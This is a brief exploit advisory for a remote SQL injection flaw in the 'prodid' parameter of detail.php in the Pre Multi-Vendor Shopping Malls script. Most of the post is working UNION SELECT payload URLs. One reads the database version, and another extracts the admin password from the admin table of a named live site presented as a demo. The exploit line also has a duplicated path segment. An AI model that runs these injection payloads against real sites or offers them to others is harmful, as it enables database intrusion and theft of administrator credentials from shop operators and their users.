Pre Multi-Vendor Shopping Malls suffers from a remote SQL injection vulnerability in detail.php.
2961263c7f8ce9eedfa40d795e69918a939211b40041ece1e52c94e307a9bb48
Pre Multi-Vendor Shopping Malls [id]Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
----------------------------------------------------------------
script : Pre Multi-Vendor Shopping Malls
script : http://www.preprojects.com/pclphp.asp
Risk : High
----------------------------------------------------------------
Dicovered by : d3b4g
email : bl4ckend[at]gmail[dot]com
Site. www.bl4ck3nd.info
----------------------------------------------------------------
Exploit : http://target.com/[path]/detail.php?prodid=detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
Live demo: http://preproject.com/prebay/detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
For admin : http://preproject.com/prebay/detail.php?prodid=-1+union+all+select+1,2,3,concat(password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin/*
# Rest find =P
----------------------------------------------------------------
----------------------------------------------------------------
Greetz: str0ke,,Hotlism.org,All my friends
-----------------------------------------------------------------
Proud to be a maldivian :))
=======================